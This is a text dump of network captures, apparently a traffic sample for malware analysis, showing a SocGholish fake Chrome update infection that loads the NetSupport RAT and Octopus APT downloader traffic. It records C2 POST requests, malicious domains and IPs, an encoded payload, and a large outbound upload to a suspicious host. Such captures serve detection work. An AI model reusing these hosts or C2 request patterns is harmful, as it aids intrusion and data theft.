Text Example

Google Chrome FAKE Download Update Malware SocGholish campaign loads NetSupport RAT PCAP File Download Traffic Sample

2019-08-26 15:03:01.209093 IP 10.8.26.101.51807 > 10.8.26.1.53: 44756+ A? mysocalledchaos.com. (37)
E..A.O……
..e
…._.5.-……………mysocalledchaos.com…..

2019-08-26 15:03:01.353045 IP 10.8.26.101.49163 > 166.62.111.64.80: Flags [P.], seq 1:409, ack 1, win 256, length 408: HTTP: GET / HTTP/1.1
E….d@…..
..e.>o@…P.9…C.&P…….GET / HTTP/1.1
Host: mysocalledchaos.com
Connection: keep-alive
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.132 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3
Accept-Encoding: gzip, deflate
Accept-Language: en

2019-08-26 15:03:39.075406 IP 130.0.233.178.80 > 10.8.26.101.49214: Flags [P.], seq 17917:19120, ack 14190, win 451, length 1203: HTTP
E…….1.[S….
..e.P.>..Y,n.?xP…0…783dd8ca1563a9aa539aeb4137359091b485d367b384986c694f6d23061f3cb4dcbc61373d9f6e6b7a2d195873694c3dd98a63e44b3cb5dcd935a1d2d3f2d485d2e6a784996c3226759f9aa0c34b2c9c61373011859485c2724193dffb5b8d1c87251f3cb4d4b39ec8c260b19485d5a7b384997c993f9d26f23969e04a5b21673590919b7a2d1957a499653ccd8a60253a0a223acaa76735b0919e84c6e6a7c41d3bba9fdc8623097c94fcbc61373ed18594859282e173cf4afb899a4065537da0dcbc217303664694b5f2e6a784942d29d98a20e1686b93faea8700a5d0b19485d2e82690996c6d6cbce6927879839b9af7d14a60b19b44c6e6a6c40c682b3ebcf453d92b97ddb86137159091948493c2a785d9f938af1c263169baa3f87d653735b0919485d0278384995cb9fe1d263179ca421cbc61373d9f6e6b722067838499385bcf4d56351a7b938aec0400a2a7d7c255f2e6a245bd6c3de90f16927978922a4aa1173590999b7a2d115205bd6c3d8dec76a2696cf19b9b376750a706a3c38436878491ad19d98a50e199ca52a89a97c1f5d091948ddd19587361ed19d98a340349fb828cf9261063c0f4a312e5a0f154b96c3618ae60647f5b839b9af7d145b091948913c2a78429c94b4fcc3552181a223acc4137359e90b085d24603927e5aa8eecd46f3b94cb4dc9c6e7611909154f0b4f181128f8b7df98a60246b3cb41c1897f160f686b213c401e7a4996c3c58be60646f59f0ea7a76000d11659485f2e6a78658583dd99a14e07b6981887921773590999b7a2d1157a49d2d09d98a80301b49e048fd61373590919485d2e6e78499627cd

2019-08-26 15:03:39.075745 IP 10.8.26.101.49214 > 130.0.233.178.80: Flags [.], ack 19120, win 256, length 0
E..(..@…[.
..e…..>.Pn.?x..].P………….
2019-08-26 15:03:39.168023 IP 130.0.233.178.80 > 10.8.26.101.49214: Flags [.], seq 19120:20580, ack 14190, win 451, length 1460: HTTP
E…….1.ZQ….
..e.P.>..].n.?xP…….1000
d8a60655f3cb4fc982227159c509085d2a6a784994c199aaa40699e38b4dcdc613735b0b5d7b5f2e6a784996cbdd98a60457b7ff4fcbc41376590229861d2e665e26e69c98e9d367399abf34cbc6136319091b5a1d3d2a784ddaa6bbeca40647b3d80dcbc3411a3e616d4a5d2c6a73510a89dd96806925ac8223aeb7661235606d315d2e6a680996c1cfd8b54655f78728adb211734b490a085d2b38112efeb7df98a4065ceb5707cbc3561e297d60485d6e79384996c1dd91be9a1ff3cd0eb9a372073c0919084e6e6a7a4b96c3dd98a2423487aa4fcbc613631909100a34492f162dffa2b39aa60455fad3d181c615302b6c783c382e6a385ad6c3de8e121615f3cf09aab272715909fd581d2e61391ae2a2afecef683196b34fcbc613631909100a34492f162dffa2b39aa60455f3cb4d5bd253734d064901335a0f0a2ff7a0b8ddc872278a63598bc6117359a50d085d20652c00f8b7b8eac06736968e23bfb46a6f590919485d2e6a784d96c3ddd8b54655f3cb4dcbc4103a104d1b485d3f2a785996c3dd9aa0500192a921aec413ef4949195c5d2e6a7a4edf8cbbfed56321f1cb3dda86136b5909194a5767070825d1a6a9ecc37457f3c94dcbc60f6619090d470d67040c2ce4a5bcfbc3523491a728ffd353735b091970486e6a7646c28ab3ecc3743392a8289fa7711f3ccd5c4c5d2e6a784996c1dd98a69a45b3cb4dcbc61371534c773c2f5729173cf8b7df98a60655f3cf4dcbc611741c676d3a344b197a4994c3dd98a68e40b3cb43cc925e162d61762c552e6a784996c3dd98a40655f3cb5c8bc6137359091b4c1e410e1d4b96c3ccd8a60255f3cb4fcf827207380b194a5d286a73510a89dd94806925ac8e3cbea77f1a2d7019485d3e2a784b8447c8d8a6021996ad39c9c601f74c49194d0f470d103d94c3df98ad1ec9b9cb43eda9632c10677c39284f06113defc3dd98b64655f1d9c9de861377156c7f3c5f2e78fc5cd6c3d8cacf613d87c94dc9c6186bc54319
2019-08-26 15:03:39.168037 IP 130.0.233.178.80 > 10.8.26.101.49214: Flags [.], seq 20580:22040, ack 14190, win 451, length 1460: HTTP
E…….1.ZP….
..e.P.>..c.n.?xP…;…477b411a270ee4a6bcecc374019baa23cbc6136319091b5ad93b2a784ddaa6bbeca4064777de0dcbc3411a3e616d4a5d2c6a73510a89dd8e806925ac8c3faea767162b5d71293361183d38e3a2b198a60645b3cb4fd9420633590d552d3b5a68785b12d69d98a3543c94a339c9c61173521185025d224c1739c98fb8ebd5523d92a54dcbc60333590b0bcc486e6a7c05f3a5a99aa614d1e68b4dce947a14317d1b485f2e6160d5dcc3cebec9760abfae3eb8927b1237466b0d2c5b0b144996c3cdd8a6044777de0dcbc25f163f7d1b484faa7f38499391b4ffce7257f3c94da3d15373590919485d2e6a784996c3dd14b94655f3cb4dcbae0433590919485d507238499ec3dd98a60655f303108bc6c32e190935281d2e4e18099687bdd8a64e35b3cb01ab86133339491920016e6afc15d6c365c4e60655f3e94d4dde53731d09edb7f1362a780b96372248be4655b1cbb9343f0b33594a19bca219733849d4c32967c01f15f3894d3f399c6a19095a48a9d1a961099680dd6c59fa4cb3cb0ecb32ec544349190b5dda952853d6c39e9852f929e98b4d88c6e78ce11359481e2e9e87ba8c83dddba6f2aaddd00dcb851387a67d02085d6d6a8cb627d89d98e406a10c20568bc65173adf63c541d2e2878bd69a8c1d8a645550734e4d786133059fde692416e6a3b49623cd085e60616f33fb28adb53731309ecb729332a780396352207bb4655b9cbba34140e33594319b0a203743849dcc32467f81815f3814d31399c6d19095348a6d1a266099689dd6459014ab3cb06cb3bec41464919025dd0952656d6c3909859f955f3cc1984a479163a7d3f48c5722a784fd5b1b8f9d26356f3cb4dcbc61b73580191571d2e6a784dc5a6b1fea40657f3ef4d039a53735d4f6b2d382d6a784996c3d598a70eddec8b4dcbc617203c657f4a5d2c6a51498e5f9798af423c80bb22b8a35c155a0919485d2e6278489e4bc2d8a60655f79828a7a011735b09274889722a7845dfadb4ecef682687aa23a8
2019-08-26 15:03:39.168042 IP 130.0.233.178.80 > 10.8.26.101.49214: Flags [P.], seq 22040:23224, ack 14190, win 451, length 1184: HTTP
E…….1.[c….
..e.P.>..iGn.?xP…X…a31073d1165948552e68784996c3dd98a6020696a72bc9c61373484919495d2623163ae2a2b3fbc30455f1cb62cb924e3359065a24384f040d39dfadaeecc7683696c84dcbc6137351091840d5312a784996c78efdca6057f3c94de2c60bef1309100b314f190b1defb3b89ba61246b3cb45cbc71bfb464919485d2a391d25f0c1dd9aa632553b900dcbcf501f387a6a063c430f7b492ed19d98ae0657f3cb4dcbc613735d5a7c243b2c6a38f18483dd99a60754f1cb4fcbff1393024919431e420b0b3ad8a2b0fdef7556f3cb5d8bc61b735b0919485d2e6a784dc5a6b1fea406574bd90dcbc713771768742d5f2e687862969f81d8a60d169faa3eb89672013c676d4b5d3a7938499ec3dc98a60655f3cb4dcf95761f3f0b194a5d076a6429d6c3d4dbca6726808223ada9107359185948552e6b784996c3dd98a6020696a72bc9c61173750901d4172e663127e5b7bcf6c563069ab128c8c68f63190911485c2e6a784996c3dd9cf5633995c94dc9c62f7351695948516704102ce4aaa9ebe0743a9ec84dcbd6537351091b485d2e6a784996c78efdca6057f3cb59d8861372590f580b314f190b4b96c1dda3a6f635b3cb4086a3671b366d582c395c0f0b3a95c3dd89e6065df3c94dcbc6137359091d1b38420c7a498427ccd8a60755f7852ca6a311735b092248294f2a7844dba6a9f0c9621497af3faeb56070590908085d266a7a4996c3dd98a60651a0ae21adc41371e11b59485c2e6e3628fba6df98a40613f3572c8bc6193e3c7d712739600b152c95c3658ae6065df3c84dcbc6137359091d1b38420c7a4996c3ccd8

2019-08-26 15:03:39.168046 IP 130.0.233.178.80 > 10.8.26.101.49214: Flags [.], seq 23224:24684, ack 14190, win 451, length 1460: HTTP
E…….1.ZN….
..e.P.>..m.n.?xP…’F..1000
a60755f48a29afb476002a0b1908e53c2a784b96c2dc9aa60455cecb55578c1361087c78243448031d2dd5afbcebd548349eae4ecb7e01335901194a5d2e6a784996c3d9cbc36a33f1cb0d73d45373580918495f2e687873962bbcd8a60a139aae21af8777172b6c6a3b5e2e6a690996cbdd9aae8e4ab3cb4dcbc24016356f1b484fca7b384997c3d9d6c76b30f1cb4fcbfc132f3b4919441b470f142dd7a7b9eac37526f0cb4dda86137b590b11c0426e6a78499290b8f4c00455f1735f8bc612735d477825382c6a7a49d0c309c5e60659b4ae3982a867162b6f782b382d6a7859d6c3d598a50eddec8b4dcbc617203c657f4a5d3c2a6b0996c2dd9bef4f11f1cb6dcbc613735b091a073f4468784b96fddd18f84655e28c28bf8f7d073c7b7f293e4b2f163de4bade982a1215f3c34dc9c6137359091948597d0f142f94c3cfd8b54655f2cb4e828f5771590b19795d36f632498784b8ecef682196b92baaa57627386b752d5e2e726d0996cbdd99a60655f3cb4dcbc24016356f1b485f2e59788dc883dd90f3683c87852ca6a31073e11b5948552e68784996c3dd98a6020696a72bc9c653cb4b4919495d2f6b7a4994c3e998be9a1ff3c218a5af67203a66692d5e2ed26a0996cbdd9aa60655f3cb4dcbc24016356f1b481d9678384997c3dc99a40657f3f84d039b53735f4c683d3c42197b4996d39d98ae0657fb43528bc613735d5a7c243b2c6a70c18983dd99a6051a91a14fcbc4135859d944085d252d1d3ddea2aef0e5693196c84d57d6537351091840d5312a784996c78efdca6057f3c94df8c63f131909111c327d1e0a20f8a4de981e1415f3c34dc9ce9b6c19091948597d0f142f94c39d20b44655f2cb4ccac413715952196c3d6e6a691af7a5b8dbc76a39b6b32eaeb6671a36671a48753d2a784196c0d510b94655f3cb4998a37f155b0911c0426e6a79499a86a5fbc37621bca927aea56771590919591d…skipping…
Access-Control-Allow-Methods: GET,POST,OPTIONS,DELETE,PUT

2019-08-26 15:04:18.005975 IP 10.8.26.101.49214 > 130.0.233.178.80: Flags [.], ack 8959766, win 3626, length 0
E..(..@…M.
..e…..>.Pn.Bf.A.EP..* y……..
2019-08-26 15:04:18.016420 IP 93.95.100.178.80 > 10.8.26.101.49204: Flags [F.], seq 13215, ack 336, win 473, length 0
E..(V|..5.H.]_d.
..e.P.4vO….:.P….n..
2019-08-26 15:04:18.016640 IP 10.8.26.101.49204 > 93.95.100.178.80: Flags [.], ack 13216, win 256, length 0
E..(..@….W
..e]_d..4.P..:.vO..P….G……..
2019-08-26 15:04:18.037966 IP 93.95.100.178.80 > 10.8.26.101.49205: Flags [F.], seq 6011, ack 365, win 473, length 0
E..(…5.B.]_d.
..e.P.58._.DT.P....z.. 2019-08-26 15:04:18.038169 IP 10.8.26.101.49205 > 93.95.100.178.80: Flags [.], ack 6012, win 256, length 0 E..(..@....V ..e]_d..5.P.DT.8.`P….S……..
2019-08-26 15:04:18.051835 IP 93.95.100.178.80 > 10.8.26.101.49206: Flags [F.], seq 343, ack 408, win 473, length 0
E..(….5..S]_d.
..e.P.6..0…..P…V…
2019-08-26 15:04:18.052044 IP 10.8.26.101.49206 > 93.95.100.178.80: Flags [.], ack 344, win 255, length 0
E..(..@….U
..e]_d..6.P……0.P…Wb……..
2019-08-26 15:04:18.568546 IP 93.95.100.178.80 > 10.8.26.101.49207: Flags [F.], seq 16499, ack 424, win 473, length 0
E..(.B..5…]_d.
..e.P.7q5jo.n..P….L..
2019-08-26 15:04:18.568555 IP 93.95.100.178.80 > 10.8.26.101.49209: Flags [F.], seq 16623, ack 424, win 473, length 0
E..(z…5.$.]_d.
..e.P.9…FV[..P…….
2019-08-26 15:04:18.568559 IP 93.95.100.178.80 > 10.8.26.101.49208: Flags [F.], seq 15919, ack 424, win 473, length 0
E..(….5…]_d.
..e.P.8(…I…P…u”..
2019-08-26 15:04:18.568563 IP 93.95.100.178.80 > 10.8.26.101.49210: Flags [F.], seq 16511, ack 424, win 473, length 0
E..(….5…]_d.
..e.P.:S.c…4.P…]…
2019-08-26 15:04:18.568814 IP 10.8.26.101.49207 > 93.95.100.178.80: Flags [.], ack 16500, win 256, length 0
E..(..@….T
..e]_d..7.P.n..q5jpP….%……..
2019-08-26 15:04:18.568842 IP 10.8.26.101.49209 > 93.95.100.178.80: Flags [.], ack 16624, win 256, length 0
E..(..@….S
..e]_d..9.PV[…..GP… ………
2019-08-26 15:04:18.568850 IP 10.8.26.101.49208 > 93.95.100.178.80: Flags [.], ack 15920, win 256, length 0
E..(..@….R
..e]_d..8.PI…(…P…u………
2019-08-26 15:04:18.568856 IP 10.8.26.101.49210 > 93.95.100.178.80: Flags [.], ack 16512, win 256, length 0
E..(..@….Q
..e]_d..:.P..4.S.c.P…]………
2019-08-26 15:04:19.288443 IP 31.13.93.35.443 > 10.8.26.101.49200: Flags [P.], seq 3947:3986, ack 89439, win 821, length 39
E..Oa-..T.d…]#
..e…0.m… D.P..5z…….”…
;.s+2..,…..+,……j….0..Y
2019-08-26 15:04:19.288452 IP 31.13.93.35.443 > 10.8.26.101.49200: Flags [F.], seq 3986, ack 89439, win 821, length 0
E..(a…T.e…]#
..e…0.m… D.P..5r…
2019-08-26 15:04:19.288696 IP 10.8.26.101.49200 > 31.13.93.35.443: Flags [.], ack 3987, win 253, length 0
E..(..@…=2
..e..]#.0… D..m..P…t………
2019-08-26 15:04:19.288940 IP 10.8.26.101.49200 > 31.13.93.35.443: Flags [F.], seq 89439, ack 3987, win 253, length 0
E..(..@…=1
..e..]#.0… D..m..P…t………
2019-08-26 15:04:19.289444 IP 31.13.93.35.443 > 10.8.26.101.49200: Flags [F.], seq 3986, ack 89439, win 821, length 0
E..(a/..T.e…]#
..e…0.m… D.P..5r…
2019-08-26 15:04:19.302333 IP 31.13.93.35.443 > 10.8.26.101.49200: Flags [.], ack 89440, win 821, length 0
E..(.k..T…..]#
…skipping…
2019-08-26 15:04:19.967401 IP 10.8.26.101.49216 > 62.172.138.35.80: Flags [P.], seq 1:119, ack 1, win 258, length 118: HTTP: GET /location/loca.asp HTTP/1.1
E…..@….
..e>..#.@.P.@..~b#.P…….GET /location/loca.asp HTTP/1.1
Host: geo.netsupportsoftware.com
Connection: Keep-Alive
Cache-Control: no-cache

2019-08-26 15:04:20.126241 IP 179.43.146.90.443 > 10.8.26.101.49215: Flags [P.], seq 215:521, ack 655, win 254, length 306
E(.ZrF..n.o=.+.Z
..e…?…….!P…l…HTTP/1.1 200 OK
Server: NetSupport Gateway/1.6 (Windows NT)
Content-Type: application/x-www-form-urlencoded
Content-Length: 152
Connection: Keep-Alive

CMD=ENCD
ES=1
DATA=u.2h.r.. .…W.h.E..=I….=n~…….7s.4…}.X…),.,.Dq.,…..()4.]..%y-A9H=n .:!…b<D…c…)=@UX.u….8+.t_A…R..b..’h[.T…jI

2019-08-26 15:04:20.134779 IP 62.172.138.35.80 > 10.8.26.101.49216: Flags [P.], seq 1:276, ack 119, win 258, length 275: HTTP: HTTP/1.1 200 OK
E..;9…q.”S>..#
..e.P.@~b#..@..P….?..HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html
Server: Microsoft-IIS/10.0
Access-Control-Allow-Origin: *
Set-Cookie: ASPSESSIONIDSQTTAQAS=JMCCAGKBFCGMCLKBAJJGPDLL; path=/
X-Powered-By: ASP.NET
Date: Mon, 26 Aug 2019 19:04:18 GMT
Content-Length: 1

,
2019-08-26 15:04:20.135084 IP 10.8.26.101.49216 > 62.172.138.35.80: Flags [.], ack 276, win 257, length 0
E..(..@….~
..e>..#.@.P.@..~b$.P…[d……..
2019-08-26 15:04:20.327276 IP 10.8.26.101.49215 > 179.43.146.90.443: Flags [P.], seq 655:927, ack 521, win 258, length 272
E..8..@…r.
..e.+.Z.?…..!…(P…….POST http://179.43.146.90/fakeurl.htm HTTP/1.1
User-Agent: NetSupport Manager/1.3
Content-Type: application/x-www-form-urlencoded
Content-Length: 76
Host: 179.43.146.90
Connection: Keep-Alive

CMD=ENCD
ES=1
DATA=l3.<(T{.E…..V….k.9|||$(m..$Cj_……..0Mt..s…M.6..

2019-08-26 15:04:20.570080 IP 179.43.146.90.443 > 10.8.26.101.49215: Flags [.], ack 927, win 253, length 0
E(.(rG..n.pn.+.Z
..e…?…(…1P…Td..
2019-08-26 15:04:20.627030 IP 10.8.26.101.137 > 10.8.26.255.137: NBT UDP PACKET(137): QUERY; REQUEST; BROADCAST
E..N……..
..e
……..:…y………. FHFAEBEECACACACACACACACACACACAAA.. ..
2019-08-26 15:04:20.675976 IP 10.8.26.101.137 > 10.8.26.255.137: NBT UDP PACKET(137): QUERY; REQUEST; BROADCAST
E..N……..
..e
……..:.
.{………. FHFAEBEECACACACACACACACACACACAAA.. ..
2019-08-26 15:04:20.727322 IP 10.8.26.101.49215 > 179.43.146.90.443: Flags [P.], seq 927:1217, ack 521, win 258, length 290
E..J..@…r.
..e.+.Z.?…..1…(P….b..POST http://179.43.146.90/fakeurl.htm HTTP/1.1
User-Agent: NetSupport Manager/1.3
Content-Type: application/x-www-form-urlencoded
Content-Length: 94
Host: 179.43.146.90
…skipping…
Access-Control-Allow-Methods: GET,POST,OPTIONS,DELETE,PUT

2019-08-26 15:04:26.662060 IP 10.8.26.101.49214 > 130.0.233.178.80: Flags [.], ack 8960053, win 3624, length 0
E..(.B@…Ln
..e…..>.Pn.G..A.dP..(……….
2019-08-26 15:04:30.427725 IP 10.8.26.101.49214 > 130.0.233.178.80: Flags [P.], seq 409336:409766, ack 8960053, win 3624, length 430: HTTP: POST /1×1.gif?ss&ss2img HTTP/1.1
E….C@…J.
..e…..>.Pn.G..A.dP..(….POST /1×1.gif?ss&ss2img HTTP/1.1
Accept: /
Accept-Language: en-us
Age: a17316821ea1038c
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: 979879f9.user3.altcoinfan.com
Content-Length: 385714
Connection: Keep-Alive
Cache-Control: no-cache

2019-08-26 15:03:01.423467 IP 10.8.26.101.53303 > 172.217.9.170.443: UDP, length 468
E….s@…..
..e.. ..7…..K@:..k..$b……#…[.!….l.X...#.Fdg3..GZ.3q'\].#K..d.u..h.,.4.V..GP.....2z2..T.b[>.8.=^."$.n>m....V.c......f..H..Z...0b....9.>.........(......rV=L~.....m-...0M|.D+.....M.@...-..OA.#..3V7....<.K...,s_..iwk...kyK..S..r=....6......Y..L......|.L.I.........q6...."{v.....)%.g,.@.....]*$.....V.../.ZUD..U.+...6.&+![..aM....d.b.4D.......(."K...?....G..z.).k.c"...!cX.$6I.... ..%…>Z$.r…..S.d.ck.[…..:D..5….jY=.rj.. p ..1…Q..H_……!…zt..……Q.. O..a.…. 2019-08-26 15:03:01.423995 IP 10.8.26.101.51808 > 172.217.1.141.443: UDP, length 1010 E….t@…#. ..e…........@.<4........ZL...;..!..@.S..!...s....2(.Bk2.m..f}.....8A..8……~.WG..S….……….}.#.v7..z5′.]..xn.x……._?..1.)..t.k8S..Y..O0Q. W.k….h.P.c…o…?4. ….Ih….A..J.jc…..x..l.D[.]a...8.M..7/&d.V./.Y...9._l....R]F..6....H..\k&..+......:.3ul.n.B.#=.....[Mw."P...Z.E..p2X.1[Be.n..=-4(V..%..VsdL...1..?..2^3.....R.........A....h.@m....&1])_x.....Lx.[e...s[.....;.2B+.qL..V..W...@TM..P..h-..R.|........1..%...d.qOm..i.}..?'..w.n"{.j.}P........;)X4...t.B..3........:..dUhQ.....;.....^.#w.e.,.@b8.DZh.1.D....@...W$~....?.....,.H.l.......n..$.+..H.$..NC5?..N...i.V..rx......8..g.$.;.=g2.....(..+.\.G.dXb.dQ.QU.....o......0.i(<.n#3...ube..q*l.wx...N!:51...{..z[......{2 8R4G.c'5.....Y;.:.0.e.-.]..Je....95..L.F#).)..@g.3&a.sg-.........S0..<|n..=....."$"D..>bE.?S.>..Y....)q. .e.F.Y2^...4......Y^..71t......4.p..v....s .h...xK>./.......d...j.>.zv[..n...M4J,..zJA.L....E.....B*. 2019-08-26 15:03:01.472993 IP 10.8.26.101.53303 > 172.217.9.170.443: UDP, length 28 E..8.x@....M ..e.. ..7...$..@:..k..$b.S.c...$....lhZW_.. 2019-08-26 15:03:01.473493 IP 10.8.26.101.51808 > 172.217.1.141.443: UDP, length 28 E..8.y@...'i ..e.....…$. @.<4……#8o.$.1Y..D….W76 2019-08-26 15:03:01.504670 IP 10.8.26.101.51808 > 172.217.1.141.443: UDP, length 28
E..8.{@…’g
..e….....$t.@.<4..........I..". wI.....: 2019-08-26 15:03:01.528689 IP 10.8.26.101.53303 > 172.217.9.170.443: UDP, length 254 E....|@....g ..e.. ..7......@:..k..$b....Jb.....r.u.7..........?2..;h.E...N}...h>W.r....r_]...'....|..YTb..7i..:i..3..Y.U......'!.jd.6.~..5...i.],+O....n9.I.G......B..<..ND./...<...1.+....R..Y...F.B.l .Xge....@x.L.a.,K.1a...,.m....L. ^7.Y...6UR.E....R..e...>X5w.....D..=f....Ku...y* 2019-08-26 15:03:01.573710 IP 10.8.26.101.53303 > 172.217.9.170.443: UDP, length 28 E..8.}@....H ..e.. ..7...$.r@:..k..$b ...I..L@...;.fV..z 2019-08-26 15:03:01.576544 IP 10.8.26.101.53303 > 172.217.9.170.443: UDP, length 337 E..m.~@..... ..e.. ..7...YGh@:..k..$b foU?.....]...C.T.+...K.....s"......,....=(K.[.w...+.E....~|.T....'.cgK,.!....V.:._q.g.~..R.i.....H..a...u."#xJ/_.@.M.b...[.."s..Q.*])...C.<........P.!2...nA..5h....M&.j..!.H..Z.K..F.w..b.....)...Y.......e6t=.\......……..”…….f….>……:…=X._.. k..P…,5…e.A%t?o.?….C.=P7P.p.&.@.M ……..6’…….(.R5..s.e0..h.
2019-08-26 15:03:01.625002 IP 10.8.26.101.53303 > 172.217.9.170.443: UDP, length 28
E..8..@….E
..e.. ..7…$R.@:..k..$b.8 ..@…0..@.um…
2019-08-26 15:03:01.802524 IP 10.8.26.101.53303 > 172.217.9.170.443: UDP, length 247
E…..@….f
..e.. ..7….1X@:..k..$b.,|..|..;….id{.,.4.3……..=L_g…Q..Q.V.z{…1}..2.L.4…….!…0^+.P…+……G[g..m..5<.(7..[….v.w…j.<&z..rl.s[x…T..aJ&3jm:^….=.n..a.?.U.m&..I..SI.V…}.h.[…h..0…|.p…K#}V~c..k,..o.s.…N…@.w….W…..4~U.! ..CF.. 2019-08-26 15:03:01.849036 IP 10.8.26.101.53303 > 172.217.9.170.443: UDP, length 28 E..8..@….@ ..e.. ..7…$..@:..k..$b..|…+:.ZQ…..o. 2019-08-26 15:03:03.418784 IP 10.8.26.101.53650 > 172.217.9.131.443: UDP, length 28
E..8..@…..
..e.. ……$_D@M…..K?…6L…..K……0b
2019-08-26 15:03:03.421675 IP 10.8.26.101.53650 > 172.217.9.131.443: UDP, length 28
E..8..@…..
..e.. ……$.@@M…..K?.?q8#.8a.Uu?…{H O
2019-08-26 15:03:03.421733 IP 10.8.26.101.53650 > 172.217.9.131.443: UDP, length 28
E..8..@…..
..e.. ……$?A@M…..K?..?w....}...N=..5. 2019-08-26 15:03:03.421795 IP 10.8.26.101.53650 > 172.217.9.131.443: UDP, length 28 E..8..@..... ..e.. ......$.^@M.....K?.|.2.\9..g.9..]...7 2019-08-26 15:03:03.422363 IP 10.8.26.101.53650 > 172.217.9.131.443: UDP, length 28 E..8..@..... ..e.. ......$..@M.....K?...J...T.J.pU.].... 2019-08-26 15:03:03.422395 IP 10.8.26.101.53650 > 172.217.9.131.443: UDP, length 28 E..8..@..... ..e.. ......$ab@M.....K?.j.U..aAm..*.5%._Z. 2019-08-26 15:03:03.424121 IP 10.8.26.101.53650 > 172.217.9.131.443: UDP, length 28 E..8..@..... ..e.. ......$p.@M.....K?..X+O.Ts.L..9:..M.. 2019-08-26 15:03:03.424206 IP 10.8.26.101.53650 > 172.217.9.131.443: UDP, length 28 E..8. @..... ..e.. ......$..@M.....K?.}..j...!.@.z.Du..9 2019-08-26 15:03:03.424444 IP 10.8.26.101.53650 > 172.217.9.131.443: UDP, length 28 E..8.!@..... ..e.. ......$..@M.....K?.......B#...._MC}.h 2019-08-26 15:03:03.435279 IP 10.8.26.101.53650 > 172.217.9.131.443: UDP, length 28 E..8.H@..... ..e.. ......$4O@M.....K?....P0.&..%.M..9*Y. 2019-08-26 15:03:03.435326 IP 10.8.26.101.53650 > 172.217.9.131.443: UDP, length 28 E..8.I@..... ..e.. ......$..@M.....K?...,.OJ.......9uP4. 2019-08-26 15:03:03.435397 IP 10.8.26.101.53650 > 172.217.9.131.443: UDP, length 28 E..8.J@..... ..e.. ......$I.@M.....K?..*.v.#^.R...[~.RR. 2019-08-26 15:03:03.435469 IP 10.8.26.101.53650 > 172.217.9.131.443: UDP, length 28 E..8.K@..... ..e.. ......$a.@M.....K?....J.G.... ..c...k 2019-08-26 15:03:03.435540 IP 10.8.26.101.53650 > 172.217.9.131.443: UDP, length 28 E..8.L@..... ..e.. ......$;@@M.....K?..."h.A...1....&... 2019-08-26 15:03:03.448683 IP 10.8.26.101.53650 > 172.217.9.131.443: UDP, length 41 E..E.T@..... ..e.. ......1..@M.....K?.).R.8:.'.k....k.-..6....g=.G_.. 2019-08-26 15:03:03.448737 IP 10.8.26.101.53650 > 172.217.9.131.443: UDP, length 28 E..8.W@..... ..e.. ......$|.@M.....K?....F. .h."........ 2019-08-26 15:03:03.541893 IP 10.8.26.101.53303 > 172.217.9.170.443: UDP, length 296 E..D..@..... ..e.. ..7...0Q.@:..k..$b..>^n;".. s..Hf:T>.....W....."... ..a.#8.a..X'B..-....a.=.6..m".7.2..^ /..aA.!N... 4F..M...SJ<.F….+h…IRy5..J.B….!!ME….]Z.
..x..C.a..”Q.1..V….Bb:.;)w.(.n..[…r*}~..gM.^.…..7T.fm…s..”….$….6..L..i.d….~.u7D~.>.m0d.M..$.iX..y…….},.Z).a.w;j.. &.M.tb..9k.?.Kn+..IE1\’
2019-08-26 15:03:03.575606 IP 10.8.26.101.64439 > 172.217.9.142.443: UDP, length 1350
E..b..@…..
..e.. ……N…Q046P….2..x…. ……………CHLO….PAD…..SNI…..VER…..CCS…..UAID(…TCID,…PDMD0…SMHL4…ICSL8…NONPX…MIDS…SCLS...CSCT…COPTd…IRTTh…CFCWl…SFCWp…———————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————www.google-analytics.comQ046…....~.......Chrome/76.0.3809.132 Windows NT 6.1; Win64; x64....X509........l..Y]..@T.]...W.....E.+...Zk^.o"d.......NSTP.w........…………………………………………………………………………………………………………………………………………………………………………………………………….

OCTOPUS APT/2 Malware PCAP Download Traffic Analysis 88.198.204.196

2018-11-06 03:08:56.939686 IP 10.1.10.73.65480 > 10.1.10.100.55555: Flags [P.], seq 1:562, ack 1, win 2053, length 561
E..YJs@….}
.
I
.
d….*…….P…….GET /apt/DustSquad/OctopusDelphi.exe HTTP/1.1
Accept: image/jpeg, application/x-ms-application, image/gif, application/xaml+xml, image/pjpeg, application/x-ms-xbap, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*
Referer: http://10.1.10.100:55555/apt/DustSquad/
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; InfoPath.2)
Accept-Encoding: gzip, deflate
Host: 10.1.10.100:55555
Connection: Keep-Alive

2018-11-06 03:08:56.939868 IP 10.1.10.100.55555 > 10.1.10.73.65480: Flags [.], ack 562, win 237, length 0

.
I…….P……………………… 2018-11-06 03:09:11.604468 IP 148.251.185.168.80 > 10.1.10.73.65490: Flags [S.], seq 949224391, ack 3926170411, win 65535, options [mss 1460,nop,wscale 6,sackOK,eol], length 0 E .4..@./……. . I.P..8……+….Kg………….. 2018-11-06 03:09:11.604766 IP 10.1.10.73.65490 > 148.251.185.168.80: Flags [.], ack 1, win 256, length 0 E..(!.@…u. . I…….P…+8…P….7…….. 2018-11-06 03:09:11.608831 IP 10.1.10.73.65490 > 148.251.185.168.80: Flags [P.], seq 1:240, ack 1, win 256, length 239: HTTP: GET /d4.php?check HTTP/1.1 E…!.@…u. . I…….P…+8…P…….GET /d4.php?check HTTP/1.1 Host: 148.251.185.168 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/*;q=0.8
Accept-Encoding: identity
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0

2018-11-06 03:09:11.735371 IP 148.251.185.168.80 > 10.1.10.73.65490: Flags [P.], seq 1:325, ack 240, win 1026, length 324: HTTP: HTTP/1.1 404 Not Found
E .l..@./..~….
.

I.P..8…….P…….HTTP/1.1 404 Not Found

.
